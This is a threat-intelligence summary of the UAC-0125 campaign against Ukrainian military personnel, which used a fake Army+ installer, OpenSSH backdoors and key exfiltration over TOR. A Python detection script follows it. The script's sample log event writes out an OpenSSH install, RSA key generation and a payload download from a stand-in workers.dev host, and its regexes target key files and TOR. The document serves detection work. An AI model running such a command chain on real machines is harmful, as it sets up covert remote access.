| Category | Details |
|---|---|
| Threat Actors | UAC-0125 (linked to APT44, FROZENBARENTS, Sandworm, Seashell Blizzard, Voodoo Bear, GRU Unit 74455). |
| Campaign Overview | UAC-0125 targets Ukrainian military personnel with fake Cloudflare Workers websites hosting malware disguised as the legitimate Army+ app. |
| Target Regions/Victims | Ukrainian military personnel. |
| Methodology | Malware disguised as an Army+ installer; PowerShell scripts for remote access using RSA key manipulation; private keys exfiltrated via TOR. |
| Product Targeted | Army+ app for military personnel. |
| Malware Reference | Fake Army+ installer leveraging NSIS; PowerShell script for OpenSSH installation and RSA key generation. |
| Tools Used | NSIS, PowerShell scripts, TOR anonymity network. |
| Vulnerabilities Exploited | Abuse of Cloudflare Workers for hosting malicious content. |
| TTPs | Phishing using legitimate services; remote access via OpenSSH; private key exfiltration through TOR. |
| Attribution | GRU Unit 74455 (Russian Federation); linked to broader APT activities by UAC-0125. |
| Recommendations | Increase monitoring of Cloudflare services, enhance endpoint protection, restrict unknown PowerShell activities, and educate military personnel on phishing risks. |
| Source | The Hacker News |
Read full article: https://thehackernews.com/2024/12/uac-0125-abuses-cloudflare-workers-to.html
The above summary has been generated by an AI language model
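The methodology and recommendation rows above describe a chain (PowerShell installs OpenSSH, generates RSA keys, and reaches out through TOR, with the lure hosted on Cloudflare Workers) that a detection engineer can turn into a scoring rule over PowerShell script-block logs. The following is an added example written for this summary, not code from the article or from CERT-UA; the indicator regexes are constructed heuristics drawn only from the TTPs listed in the table, the `workers.dev` pattern assumes the lures used Cloudflare's default Workers domain, and the sample events are constructed log records rather than real telemetry.

```python
import re

# Indicator categories taken from the TTP rows of the summary table.
# The regexes are constructed heuristics, not signatures from the report.
INDICATORS = {
    # OpenSSH server being installed or started from PowerShell
    "openssh_install": re.compile(
        r"Add-WindowsCapability.*OpenSSH|Start-Service\s+sshd", re.I),
    # RSA key pairs created or authorized_keys touched from a script
    "rsa_key_handling": re.compile(
        r"ssh-keygen|-t\s+rsa|authorized_keys|id_rsa", re.I),
    # References to the TOR anonymity network (binary, onion service, project site)
    "tor_usage": re.compile(r"\btor\b|\.onion\b|torproject", re.I),
    # Downloads from a Cloudflare Workers default domain (assumption: lures used workers.dev)
    "workers_download": re.compile(r"https?://[\w.-]+\.workers\.dev", re.I),
}


def analyze_event(event):
    """Return the list of indicator categories present in one script-block record."""
    script = event.get("script", "")
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def flag_events(events, threshold=2):
    """Flag records where at least `threshold` distinct categories co-occur.

    A single category (e.g. an administrator enabling OpenSSH) is common and
    noisy on its own; the combination of install + key handling + TOR/Workers
    traffic is what matches the described tradecraft.
    """
    flagged = []
    for ev in events:
        hits = analyze_event(ev)
        if len(hits) >= threshold:
            flagged.append((ev["event_id"], hits))
    return flagged


# Constructed sample script-block records (not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 1001, "host": "WS-01",
     "script": "Get-ChildItem C:\\Users -Recurse | Where-Object Length -gt 1MB"},
    {"event_id": 1002, "host": "WS-02",
     "script": "Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    {"event_id": 1003, "host": "WS-03",
     "script": ("Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; "
                "Start-Service sshd; ssh-keygen -t rsa -f C:\\ProgramData\\id_rsa; "
                "Invoke-WebRequest https://lure-example.workers.dev/payload -OutFile tor.exe")},
]

if __name__ == "__main__":
    for event_id, hits in flag_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Run against real PowerShell script-block logging (Event ID 4104), the threshold keeps routine OpenSSH administration (event 1002) out of the alert queue while the co-occurrence in event 1003 is surfaced; tune the threshold and the category list to the environment's baseline.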